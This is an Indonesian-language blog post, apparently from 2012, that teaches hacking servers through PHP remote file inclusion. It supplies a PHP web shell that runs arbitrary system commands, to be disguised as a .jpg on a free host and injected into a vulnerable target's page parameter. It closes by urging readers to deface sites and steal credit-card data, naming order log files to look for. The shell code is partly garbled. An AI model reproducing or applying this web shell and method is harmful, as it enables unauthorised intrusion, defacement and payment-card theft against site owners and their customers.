Minggu, 21 Oktober 2012

 

HACKING SERVER DENGAN PHP INJECTION




1. - Hosting file(Yg gratisan jg banyak. Contoh : Geocities , Ripway, dll)
2. - Lagu2 Linkin Park, Blink 182, My Chemical Romance buat nemenin aksi jahanam kamu



Oke, copy paste script berikut



Code:


<font face=verdana size=7></font>
<center>CMD - SystemCommand

</center><font face=Verdana size=1>
# CMD PHP : 
# Re-DESIGN by : Bagus Hacks A.K.A B-479


<hr></hr>
<font face=Verdana size=1>// CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
if (isset($chdir)) @chdir($chdir);
ob_start();
system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) echo str_replace(">", ">", str_replace("
$output));
?>
</font>

<hr></hr>
<font face=Verdana size=1></font>
Bagus Hacks | Muslim Hacker | TeaMpOisoN | Anoymous | 
</font>
Kalo udah, save dng nama CMD dan format .jpg . Lalu upload ke hosting kamu. (Yg grtisan jg banyak, udh di bahas di atas) Setelah saya upload, nanti saya akan mendapat URL seperti berikut:
http://www.geocities/n4is3n/cmd.jpg

Setelah itu cari target (Ini membutuhkan kesabaran tingkat tinggi)

Setelah ketemu, contoh:

http://www.target.com/main.php?page=article

Nah, kamu ubah URL-nya jd

.http://www.target.com/main.php?page=http://www.geocities/n4is3n/cmd.jpg&cmd=<perintah unix="" disini=""></perintah>

Lalu eksekusi URL tsb! contoh:
.http://www.target.com/main.php?page=http://www.geocities/n4is3n/cmd.jpg&cmd=ls -l

dan liat hasil-nya... browser akan menampilakan semua direktori yg ada di server sesuai perintah UNIX tadi (ls -l adalah perintah untuk melihat isi direktori beserta
permission-nya).

Untuk defacing atau carding, kamu bisa mengexplore lbh jauh lg...

Oke...oke... saya kasih kata kunci-nya:

untuk deface = "index.html, index.php, index.htm"
untuk carding = "orderlog.txt, order.php"

Semua ada di server, tinggal bagaimana cara kamu menemukan-nya :D

so... Happy Hacking!
Share:

0 komentar:

Posting Komentar